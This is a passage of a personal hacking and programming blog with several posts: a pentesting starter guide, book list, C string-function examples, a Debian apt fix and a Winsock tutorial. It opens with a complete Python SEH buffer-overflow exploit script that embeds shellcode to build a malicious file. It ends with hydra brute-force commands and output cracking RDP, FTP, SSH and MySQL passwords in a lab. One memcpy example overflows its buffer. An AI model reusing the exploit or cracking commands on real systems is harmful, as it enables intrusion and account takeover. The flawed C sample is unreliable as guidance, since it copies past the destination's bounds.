Now open the nator.plf on the application. Just press SHIFT+F9 at first crash. We hit our breakpoint. If we scroll down a bit lower then we see that we have a bunch of "D" within our 4108bytes

 After pressing SHIFT+F9 we hit the breakpoint. Now press F8 until we reach nop:

We just did a backward jump to 20 bytes nops. Well Let's keep going with F8. 0012FD53  ^E9 2BF8FFFF      JMP 0012F583 Actually the long jump. And it again goes back to 2000bytes backward where our nops start. So if we keep going by pressing F8 then we will reach the "44" soon which mean "D", Later we will replace the D with our real shellcode.

 So it is time to put our real shellcode. Here is the final script:

print"Creating expoit."
f=open("nator.plf","w") #Create the file
junk="\x90"*2608
#343 bytes shellcode
shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x36\x42\x50\x5a")
nops ="\x90"*1152
jump ="\xe9\x2b\xf8\xff\xff"#Jump back -2000 bytes
nseh ="\xeb\xea\x90\x90"#short jump 
seh ="\x7a\x8f\x44\x00"#0x00448f7a
more="\x90"*1000

try:   
    f.write(junk+shellcode+nops+jump+nseh+seh+more)     
    f.close()
print"File created"
except:
print"File cannot be created"

Note: I have copied the shellcode from an working exploit. But you can always generate shellcode using metasploit. Do so!


And pop up the calc:

BOOM!!!

The most important of this exploit is dealing with NULL-BYTES "pop pop ret".  I hope you now have clear understanding of how to work with these kind of situation. But still if you have any problem , Contact me or comment here and i will try my best to help you!

I have tried to make it simple. If you want to know more about SEH base Exploits , corelan has very good tutorial about SEH:
https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/  and

https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/


Good luck and happy hunting!!!

Getting started in pentesting!!!

May 25, 2013, 10:45 am

≫ Next: Useful books to get into hacking!

≪ Previous: Exploit writing>>> SEH based!

$

0

0

You also want to get started with pentesting & hacking? There are thousands of guys want to get started with pentesting and hacking but they don't have any clue that where they should start. So i  quickly wrote this articles so that you can get started very easily without any confusion.

NOTE: Hacking is a long way since it is a research. You need to change your mind completely and be 100% serious that you will start studying to be a hacker or a pentester. If you want to hack for temporary fun, inspire your friend then being a script kiddie is okay(Keylogger and RAT). This is not possible to learn hacking in few months , it may take 3-10 years to be a good one. So you take one option of 1.Become Script Kiddie , 2. Become professional pentester or hacker, security researcher. Up to you!!! 

Basic

1. Basic of Networking: Understanding of networking really important since everything we need to do over network. So you should have a good understanding of tcp/ip and OSI models.

2. Programming: Programming is very important for being a hacker or pentester. Because we must know how a program and system really works. Also Without programming skills it is hard to find a vulnerability. Most important languages you should learn are:

                Python.
                C/C++
                Assembly
                PHP

Intermediate

1. Become A System Administrator: Yes, you need to be a system administrator of Linux and Windows both. If you can't be a good system administrator then it is not possible to be a good pentester.

2. Writing codes: Write basic code. You don't need to be software developer. But programming is the best weapon to solve your problem. For example, You want to complete a task automatically(such as deleting a file), Checking hundreds of file permission etc. So write codes!!! Maybe 10-50 lines of codes can do very powerful work for you.

3. Read some online articles, resource:

Attack Idea before going more deep

OWASP Testing Guide

Common Weakness

WASC

4. Try to go deeper of the Operating System: Yes, Understand the internal of OS(Windows,linux). If you want to be hacker then you need to know the Operating System very well.

Intermediate+

1. Virtualization :  Get vmware workstation or virtual box . Install various operating system such windows xp,7, redhat,debian etc. Install some additional software and run your port scanner, vulnerability scanner etc. 

2. Old Application and known vulnerability: go to exploit-db.com and get some vulnerable application. Install them on your vm and re-create the exploit. Use your debugger and knowledge. You should install various software including Web or system software. You may get owasp "broken web application".

3.   Pentesting distro: Install Kali(Backtrack) Linux and use the tools against your vm. 

4. Hack: Hack yourself and hack the vm before going to real world.

Advance

You will understand when you are need of advance knowledge and what is meaning of "advance".

There are lots of  things you need to become a successful hacker. Everything can take 1,2 or 3 even more years. You need to be patience and serious about hacking. It is not possible to hack or we can't learn to hack within few days. Just keep going until success and the success will be waiting for you :). Various Books on pentesting is really really very helpful. I will write another new post with review of some books to learn hacking more quickly. 

Useful books to get into hacking!

May 30, 2013, 10:57 am

≫ Next: Easy example of strstr(),strspn(),strrchr(),strchr(),strbrk(),memcpy(),memset(),memcmp() - #include

≪ Previous: Getting started in pentesting!!!

$

0

0

A good book can take you so far. Having some good book really a good idea to learn something new and improving our knowledge. I have posted some useful book's amazon link (no matter how you get them). These book will really help you much to go into hacking.  After reading these book you will have a very good understanding of system and hacking and you will be able find out the information what you are looking for. There are thousands of free papers but you don't know what to search and what to learn. After reading these book you will have goal though.

1. C Primer Plus 5th Edition: To get into hacking and penetration we need to understand programming Language. Most of the powerful language is C. This book is very good to learn the C programming language whereas "The C programming language" is bit harder for newbie. Get this book and start reading.

2.  Core Python Application Programming: For automatic and quick task we must need to code in an scripting language(Such as for exploit development). For this, the python is really very powerful(my favorite language). Learn Python from this book. For basic of python get the book "Learn python the hard way" or go to www.python.org tutorial section.


3. Assembly Language Step-by-Step: Assembly language is very very important for understanding how system work and for exploit development. This book will teach you the basic assembly language using nasm which is enough to understand asm registers,instruction and basic coding(such as shellcoding). After read this book you should read intel manuals.

4. Advanced Linux Programming: Don't avoid the Linux internal. We are required to know Linux Internal And system programming is best to go with. This book is good and freely download-able.

5. Get two books on Windows: Windows® Internals, Part 1: Covering Windows Server® 2008 R2 and Windows 7
and
 Windows Internals, Part 2: Covering Windows Server® 2008 R2 and Windows 7

and read them when you have free time. It is very useful knowing windows internals.


6. Basic of penetration testing 2nd edition: I have read the first edition and it was good for newbie who is coming into hacking. Get Basic idea of penetration testing and hacking from this book.

7. Web application hacker handbook 2nd edition: This is a gold book to learn web hacking. If you are newbie and read this book carefully then you will have a very good understanding of hacking web. I believe you don't need any other book to learn web hacking. After reading this book you just need to start your real research on web hacking. Another book is owasp "web application penetration testing guide" which a good start too.

8. The shellcoder's handbook second edition: This book is very good to learn system hacking. It is bit outdated but still very useful. It discussed about common software vulnerability like buffer overflow, format string, shellcoding etc. Get this book!!!

9. Hack using python:  I did not read this book fully but the book is very good if you want to know that how to hack using python programming language. Yes , You should read this book(Get somehow!).

 

10. Corelan: Corelan have more than 11 tutorials which is worth than other commercial exploit development course and books. Read them if you want to move to exploit development and shellcoding. 

11. Metasploit cookbook

Easy example of strstr(),strspn(),strrchr(),strchr(),strbrk(),memcpy(),memset(),memcmp() - #include

June 17, 2013, 9:48 am

≫ Next: debian apt-get or aptitude update Hash Sum mismatch

≪ Previous: Useful books to get into hacking!

$

0

0

I have written quick example of few function such as strspn(),strrchr(),strchr(),strbrk(),memcpy() etc of C language.These function we often use for dealing with string. These code are very easy to read and write. I am just pasting the code here, Please read the comments and if you have any questions , please post comment!

strstr():

/*
 * use and example of strstr() function
 */
/*
 * The  strstr()  function finds the first occurrence of the substring needle in the string haystack. 
 * The terminating null bytes ('\0') are
 * not compared.
 */

#include<stdio.h>
#include<string.h>
intmain(){
    char *str="what the hell! system got hacked!!!";
    char *str2="what";
    char *str3="system";
    printf("\n%s\n\n",strstr(str,str3));
    printf("%s\n\n",strstr(str,str2));
    return 0;
}

/* gcc strstr1.c -o strstr1
 * ./strstr1
 * system got hacked!!!
 * 
 * what the hell! system got hacked!!!
 * 
 */

strspn():

/* The use and example of strspn() */
/*search a string for a set of bytes. The strspn() 
 * function calculates the length (in bytes) of the initial segment of s which consists entirely of bytes in accept. */

#include<stdio.h>
#include<string.h>

intmain(){
    char *str="C is a greate system language 1337";
    char *str2="1234567890";
    printf("Lets see %s\n",strspn(str,str2));
    return 0;

}

strrchr():

/*use and example of strrchr()*/
/*
 * The strrchr() function returns a pointer to the last occurrence of the character c in the string s.
 * This will search the char from last. For example if we search 'a' then it will point you "ammer"
 * from the "programmer"

 */

#include<stdio.h>
#include<string.h>

intmain(){
    char *str="You are the programmer";
    int str1;
    printf("Enter a char:");
    scanf("%c",&str1);
    //int search=strrchr(str,str1);
    printf("\'%c\' found in \'%s\'\n",str1,strrchr(str,str1));
    return 0;
}

/*
 * pusheax@programming:~/codes/linux1blog$ gcc strrchar.c -o strrchar
 * pusheax@programming:~/codes/linux1blog$ ./strrchar
 * Enter a char:a
'a' found in 'ammer'
pusheax@programming:~/codes/linux1blog$ ./strrchar
Enter a char:u
'u' found in 'u are the programmer'
pusheax@programming:~/codes/linux1blog$ ./strrchar
Enter a char:o
'o' found in 'ogrammer'
pusheax@programming:~/codes/linux1blog$ ./strrchar
Enter a char:y
'y' found in '(null)'
pusheax@programming:~/codes/linux1blog$ ./strrchar
Enter a char:Y
'Y' found in 'You are the programmer'
pusheax@programming:~/codes/linux1blog$ 
*/

strchr():

/* The use and example of strchr() */

#include<stdio.h>
#include<string.h>/*include string.h for all the string related function*/

intmain(){
    char *strng="Mr. Stupid!"; //We will search the char in this string
    char secstr='S';        //Char should be closed in single quote
    int search=(strchr(strng,secstr) != NULL);  //The strchr() is the search function

    if (!search)                    //Compare if search variable is not true
        printf("The char is not found!\n");
    else                        //Otherwise it is true
        printf("Wow the char \'%c\' found in strng \"%s\"\n",secstr,strng);

    return 0;
}

strbrk():

/* use and example of strpbrk() */
/* strpbrk - search a string for any of a set of bytes */

#include<stdio.h>
#include<string.h>

intmain(){
    char *str="Programming is another best way to learn hacking";
    char *str2="b";
    int search=*strpbrk(str,str2); //Is "b" in str2 in str?
    if (!search)
        printf("Nothing!\n");
    else 
        printf("Found \'%c\' in \"%s\"\n",search,str); //Yes it is, well print that what char it is. strpbrk is pointer to the char!
    return 0;
}

memcpy():

/*Use and example memcpy() and memmove()*/

/*memcpy - copy memory area*/

//memcpy() does not check the boundary. Be careful!

#include<stdio.h>
#include<string.h>


intmain(){
    char str[10];
    char str1[]="Hello all hackers!";       
    memcpy(str,str1,sizeof(str1));          
    printf("%s\n",str);
    return 0;
}

memset():

//Use and example of memset()
//memset - fill memory with a constant byte

#include<stdio.h>
#include<string.h>

intmain(){
    char str[]="Life is boring!";
    int str1='A';
    printf("First string:%s\n",str);
    printf("Now it is:%s\n",memset(str,str1,sizeof(str1)));
    return 0;
}

memcmp():

#include<stdio.h>
#include<string.h>

intmain(){
    char str[]="ABa";
    char str1[]="AbA";
    int what=memcmp(str,str1,sizeof(str));
    if(what)
        printf("Return:%d not matched\n",what);
    else
        printf("Return:%d mean equal\n",what);

    printf("Lets print something different!\n");
    printf("Confused for:%d ?\n",memcmp(str,str1,2));
    printf("Another confusion for :%d ?\n",memcmp(str,str1,1));
    return 0;
}

debian apt-get or aptitude update Hash Sum mismatch

July 10, 2013, 1:23 am

≫ Next: windows socket programming in c++ , your first socket(networking) program!

≪ Previous: Easy example of strstr(),strspn(),strrchr(),strchr(),strbrk(),memcpy(),memset(),memcmp() - #include

$

0

0

We need "apt-get update" to update the debian source list if we want to upgrade debian to next release. When i was going to upgrade debian , i got error "Hash Sum mismatch" something like:

W: Failed to fetch bzip2:/var/lib/apt/lists/partial/mirrors.yourmirror.com_debian_dists_wheezy_main_i18n_Translation-en  Hash Sum mismatch

E: Some index files failed to download. They have been ignored, or old ones used instead.

It happened for several times in the past, Today, when i was going to upgrade debian 7 to 7.1.0 i got this error again.

Anyway, It happened for the package server. So i decide to change the server address from the sources.list . To select fast server i used "netselect-apt" :

apt-get install netselect-apt && cd /etc/apt/ && netselect-apt -n wheezy -o sources.list

This command will install the netselect-apt and find the fast server then replace the old sources.list. It will output like:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

Duplicate address 64.50.233.100 (http://64.50.233.100/debian/, http://ftp-nyc.osuosl.org/debian/); keeping only under first name. netselect: 43 (23 active) nameserver request(s)... Duplicate address 128.30.2.36 (http://128.30.2.36/debian/, http://debian.lcs.mit.edu/debian/); keeping only under first name. netselect: unknown host debian.comu.edu.tr netselect: 17 (17 active) nameserver request(s)... Duplicate address 128.61.240.89 (http://128.61.240.89/debian/, http://debian.gtisc.gatech.edu/debian/); keeping only under first name. Running netselect to choose 10 out of 398 addresses. ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... The fastest 10 servers seem to be: http://mirror.positive-internet.com/debian/ http://mirror.0x.sg/debian/ http://mirror.sov.uk.goscomb.net/debian/ http://mirror.vorboss.net/debian/ http://archive.mmu.edu.my/debian/ http://debian.mirrors.ovh.net/debian/ http://ukdebian.mirror.anlx.net/debian/ http://ukdebian.mirror.anlx.net/debian/ http://opensource.nchc.org.tw/debian/ Of the hosts tested we choose the fastest valid for HTTP: http://mirror.0x.sg/debian/ Writing netselect-apt.list. Done.

You can exclude your local server and replace with working fast server if netselect-apt selecting the same server for you.


Hope this post will help someone!

---

windows socket programming in c++ , your first socket(networking) program!

July 28, 2013, 3:26 am

≫ Next: Brute force attack & dictionary password cracking using hydra

≪ Previous: debian apt-get or aptitude update Hash Sum mismatch

$

0

0

Windows socket programming in c/c++ was frustrating for me when it was first time. But winsock2 is not that hard to make your basic networking program in few minutes. Today i will explain the basic of windows socket programming step by step using winsock2 and c++.  If you don't have understanding in c or c++ then you will not understand this article. So before having basic knowledge in c/c++ you should not start with windows/socket programming. I am fan of gcc compiler so i used gcc(mingw-w64) to compile all the codes(Of this blog).

To write any windows program we are required to include the "windows.h" . And for the socket we need only "winsock2.h". Only two required header we need are:

<iostream>
<winsock2.h>

Well, Let's go step by step with example:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

#include <iostream> #include <winsock2.h> intmain() { WSADataversion;//We need to check the version. WORDmkword=MAKEWORD(2,2); intwhat=WSAStartup(mkword,&version); if(what!=0){ std::cout<<"This version is not supported! - \n"<<WSAGetLastError()<<std::endl; } else{ std::cout<<"Good - Everything fine!\n"<<std::endl; } return0; }

In line 7 WSAData is a structure name which holds the information about windows socket implementation. So here we declare our own new object to work with called "version".  About WSAData here you will get more in details.

In line 8 MAKEWORD() is a macro which is type of WORD. MAKEWORD(2,2) is going to be "2.2".

In line 9, We store the WSAStartup() function in variable "what" . This function will check if the version is higher or lower. If the version is correct as we expected then it will return value 0 otherwise something else which should be checked by WSAGetLastError() as i did in line 11.

Compile the code and run , if you are in xp+ then you will get output "Good - Everything fine"




Since everything fine , So we want to create our real socket using structure name "SOCKET":

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

#include <iostream> #include <winsock2.h> intmain() { WSADataversion;//We need to check the version. WORDmkword=MAKEWORD(2,2); intwhat=WSAStartup(mkword,&version); if(what!=0){ std::cout<<"This version is not supported! - \n"<<WSAGetLastError()<<std::endl; } else{ std::cout<<"Good - Everything fine!\n"<<std::endl; } SOCKETu_sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(u_sock==INVALID_SOCKET) std::cout<<"Creating socket fail\n"; else std::cout<<"It was okay to create the socket\n"; return0; }

Our second step is creating socket. So in line 17 we declare the variable of SOCKET called u_sock and store the socket() function.

AF_INET specify to use ipv4.

SOCK_STREAM to specify that two connection based and reliable which used by AF_INET.

IPPROTO_TCP specify that its Internet Protocol (TCP/IP).

You can get more details in this link http://msdn.microsoft.com/en-us/library/windows/desktop/ms740506%28v=vs.85%29.aspx  .

If something wrong creating the socket then it return the value "INVALID_SOCKET" which we checked in line 18.




Time to specify address and make connection. For bit theory and basic idea read: http://msdn.microsoft.com/en-us/library/windows/desktop/ms740496%28v=vs.85%29.aspx and connect() function http://msdn.microsoft.com/en-us/library/windows/desktop/ms737625%28v=vs.85%29.aspx.

The code for address information and using connect() function:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41

#include <iostream> #include <winsock2.h> intmain() { WSADataversion;//We need to check the version. WORDmkword=MAKEWORD(2,2); intwhat=WSAStartup(mkword,&version); if(what!=0){ std::cout<<"This version is not supported! - \n"<<WSAGetLastError()<<std::endl; } else{ std::cout<<"Good - Everything fine!\n"<<std::endl; } SOCKETu_sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(u_sock==INVALID_SOCKET) std::cout<<"Creating socket fail\n"; else std::cout<<"It was okay to create the socket\n"; //Socket address information sockaddr_inaddr; addr.sin_family=AF_INET; addr.sin_addr.s_addr=inet_addr("192.168.206.1"); addr.sin_port=htons(80); /*==========Addressing finished==========*/ //Now we connect intconn=connect(u_sock,(SOCKADDR*)&addr,sizeof(addr)); if(conn==SOCKET_ERROR){ std::cout<<"Error - when connecting "<<WSAGetLastError()<<std::endl; closesocket(u_sock); WSACleanup(); } return0; }

In the above example line 25 we declare the object to work with. Then in 26 we specify to go with ipv4 , in line 27 we set our target address to connect to and in line 28 we set port number.

Line number 32 declaring a variable type of int and storing full connect() function for using it later. The parameters u_socks is the socket name we have created in line 17, (SOCKADDR*)&addr mean the address information pointing to SOCKADDR and the length of the all information specified.

Line number 33 to 36 checking if there is anything wrong, connect() function return error code SOCKET_ERROR when unsuccessful. If so we check the Error code number then close the socket using closesocket() function.

Assuming everything Went fine. We are almost done. But without getting some data from Remote host may make you thinking bad. So lets use more two function send() and recv(). Using send() function we send whatever to remote host and using recv we store the output to array:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58

#include <iostream> #include <winsock2.h> #include <string> intmain() { WSADataversion;//We need to check the version. WORDmkword=MAKEWORD(2,2); intwhat=WSAStartup(mkword,&version); if(what!=0){ std::cout<<"This version is not supported! - \n"<<WSAGetLastError()<<std::endl; } else{ std::cout<<"Good - Everything fine!\n"<<std::endl; } SOCKETu_sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(u_sock==INVALID_SOCKET) std::cout<<"Creating socket fail\n"; else std::cout<<"It was okay to create the socket\n"; //Socket address information sockaddr_inaddr; addr.sin_family=AF_INET; addr.sin_addr.s_addr=inet_addr("192.168.206.1"); addr.sin_port=htons(80); /*==========Addressing finished==========*/ //Now we connect intconn=connect(u_sock,(SOCKADDR*)&addr,sizeof(addr)); if(conn==SOCKET_ERROR){ std::cout<<"Error - when connecting "<<WSAGetLastError()<<std::endl; closesocket(u_sock); WSACleanup(); } //Send some message to remote host char*mymsg="GET / HTTP/1.1\r\n\r\n"; charvect[512]={0}; intsmsg=send(u_sock,mymsg,sizeof(mymsg),0); if(smsg==SOCKET_ERROR){ std::cout<<"Error: "<<WSAGetLastError()<<std::endl; WSACleanup(); } intget=recv(u_sock,vect,512,0); if(get==SOCKET_ERROR){ std::cout<<"Error in Receiving: "<<WSAGetLastError()<<std::endl; } std::cout<<vect<<std::endl; clossocket(u_sock); return0; }

In line 42 we define a string to send to remote address. Line 43 declaring an array to hold output of the command.

Line number 45 , we store the send() and the required parameters . u_sock is the name of the created socket , mymsg has the command to send to the remote address, Maximum length of the command, And the flag.

In the line 51 , we used recv() to get output and store to an array.  The parameters of this function same as send().

 Line number 55, Getting the output from the array and printing in the screen then line 56 closing the socket.




I hope i made this article simpler to understand. I don't really like to write too much theory since there are lots and not that useful to me(may be to you too).  If you have any questions , please comment!


Hope you enjoyed!





 

Brute force attack & dictionary password cracking using hydra

January 7, 2014, 10:27 am

≫ Next: Compiling c++ multiple sources file

≪ Previous: windows socket programming in c++ , your first socket(networking) program!

$

0

0

Brute force attack and Dictionary password cracking attack is still effective. Brute force attack can be more effective if the hacker has good knowledge in password profiling,information gathering. Today, i will shortly explain that how a hacker can crack password using hydra brute force attack or dictionary attack. Before that let me give you a short definition of Brute force and dictionary attack.

Brute force attack

Brute force attack is combination of all character a-z,A-Z,1-3 and other special characters.

Dictionary password attack

Dictionary attack is a list of common password. For example, you know "admin" is used as password to protect various confidential resource. So you put the "admin" word in your dictionary file. You also can download free password list from various source(Google search!). If the hacker is lucky then password will be in the list.

---

I will explain how a hacker can make brute force attack using hydra to crack various online accounts.

Brute Force Attack

If hackers decide to make pure brute force then they need to exclude the option '-P' and use '-x min:max:char', for example '-x 3:3:a' :

root@find:~/Desktop# hydra -t 10 -V -f -l root -x 4:6:a ftp://192.168.67.132

The hydra syntax:
-t = How many parallel attempt at a time(1/5/10/100 ?). Don't use too much otherwise you will get false result
-V = Show output
-f = Stop when found the password.
-l = The Username (-L for username from file)
-P= Dictionary file
IP-address-or-domain module-such-as-http-form

Cracking the RDP password

We know the default username of windows is "administrator" So we can brute force the password only:

root@find:~/Desktop# hydra -t 1 -V -f -l administrator -P common.txt rdp://192.168.67.132
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 13:24:21
[DATA] 1 task, 1 server, 933 login tries (l:1/p:933), ~933 tries per task
[DATA] attacking service rdp on port 3389
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Admin" - 1 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Administration" - 2 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "crm" - 3 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CVS" - 4 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS" - 5 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS25" - 6 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS31" - 7 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "INSTALL_admin" - 8 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Log" - 9 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Logs" - 10 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Pages" - 11 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "youradmin" - 12 of 933 [child 0]
[3389][rdp] host: 192.168.67.132   login: administrator   password: youradmin
[STATUS] attack finished for 192.168.67.132 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 13:24:46

I did it on vmware workstation and was too slow!

Cracking FTP password

Hacker knows the user name of the FTP is 'root' , So hacker make a quick password guessing with following command:

root@find:~/Desktop#hydra -t 5 -V -f -l root -P common.txt ftp://192.168.67.132
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 13:45:55
[DATA] 5 tasks, 1 server, 934 login tries (l:1/p:934), ~186 tries per task
[DATA] attacking service ftp on port 21
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Admin" - 1 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Administration" - 2 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "crm" - 3 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CVS" - 4 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS" - 5 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS25" - 6 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS31" - 7 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "INSTALL_admin" - 8 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Log" - 9 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Logs" - 10 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Pages" - 11 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "youradmin" - 12 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "ftpadmin" - 13 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Servlet" - 14 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Servlets" - 15 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "SiteServer" - 16 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Sources" - 17 of 934 [child 0]
[21][ftp] host: 192.168.67.132   login: root   password: ftpadmin
[STATUS] attack finished for 192.168.67.132 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 13:45:55
root@find:~/Desktop# 

Here the password is ftpadmin!

root@find:~/Desktop#ftp 192.168.67.132
Connected to 192.168.67.132.
220 Hello, I'm freeFTPd 1.0
Name (192.168.67.132:root): root
331 Password required for root
Password:
230 User root logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection
drwxr-xr-x   1 root       root            0 Jan  7 13:39 .
drwxr-xr-x   1 root       root            0 Jan  7 13:39 ..
226 Directory send OK

Cracking SSH password with hydra

root@find:~/Desktop#hydra -t 5 -V -f -l root -P common.txt localhost ssh
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 14:11:56
[DATA] 5 tasks, 1 server, 935 login tries (l:1/p:935), ~187 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target localhost - login "root" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target localhost - login "root" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target localhost - login "root" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target localhost - login "root" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS" - 5 of 935 [child 4]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS25" - 6 of 935 [child 1]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS31" - 7 of 935 [child 3]
[ATTEMPT] target localhost - login "root" - pass "INSTALL_admin" - 8 of 935 [child 4]
[ATTEMPT] target localhost - login "root" - pass "Log" - 9 of 935 [child 2]
[ATTEMPT] target localhost - login "root" - pass "sshfuck" - 10 of 935 [child 0]
[22][ssh] host: 127.0.0.1   login: root   password: sshfuck
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 14:11:58

MySQL password cracking using hydra

In this case we are going to crack a empty password of mysql. Some Peoples still does not use password to protect their database server. We can make brute force attack like this:

root@find:~/Desktop#hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 14:18:16
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] 4 tasks, 1 server, 937 login tries (l:1/p:937), ~234 tries per task
[DATA] attacking service mysql on port 3306
[ATTEMPT] target localhost - login "root" - pass "root" - 1 of 937 [child 0]
[ATTEMPT] target localhost - login "root" - pass "" - 2 of 937 [child 1]
[ATTEMPT] target localhost - login "root" - pass "Admin" - 3 of 937 [child 2]
[ATTEMPT] target localhost - login "root" - pass "Administration" - 4 of 937 [child 3]
[3306][mysql] host: 127.0.0.1   login: root   password: 
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 14:18:16

Attention to the option of hydra: -e ns .

